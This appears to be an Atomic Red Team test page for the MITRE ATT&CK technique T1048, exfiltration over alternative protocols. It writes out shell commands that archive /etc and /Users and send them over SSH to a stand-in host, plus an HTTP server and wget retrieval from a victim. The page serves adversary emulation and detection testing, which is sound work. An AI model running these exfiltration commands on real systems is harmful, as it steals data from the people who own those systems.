Skip to content

Latest commit

 

History

History
83 lines (51 loc) · 3.05 KB

T1048.md

File metadata and controls

83 lines (51 loc) · 3.05 KB
Raw

T1048 - Exfiltration Over Alternative Protocol

Description from ATT&CK

Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.

Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)

Platforms: Linux, macOS, Windows

Data Sources: User interface, Process monitoring, Process use of network, Packet capture, Netflow/Enclave netflow, Network protocol analysis

Requires Network: Yes

Atomic Tests


Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH

Input a domain and test Exfiltration over SSH

Remote to Local

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Inputs

Name Description Type Default Value
domain target SSH domain url target.example.com
user_name username for domain string atomic
password password for user string atomic

Run it with sh!

ssh ${domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz


Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH

Input a domain and test Exfiltration over SSH

Local to Remote

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Run it with sh!

tar czpf - /Users/* | openssl des3 -salt -pass ${password} | ssh ${user_name}@${domain} 'cat > /Users.tar.gz.enc'


Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP

A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Run it with these steps!

  1. Victim System Configuration:

    mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

  2. Using Python to establish a one-line HTTP server on victim system:

    cd /tmp/victim-staging-area python -m SimpleHTTPServer 1337

  3. To retrieve the data from an adversary system:

    wget http://VICTIM_IP:1337/victim-file.txt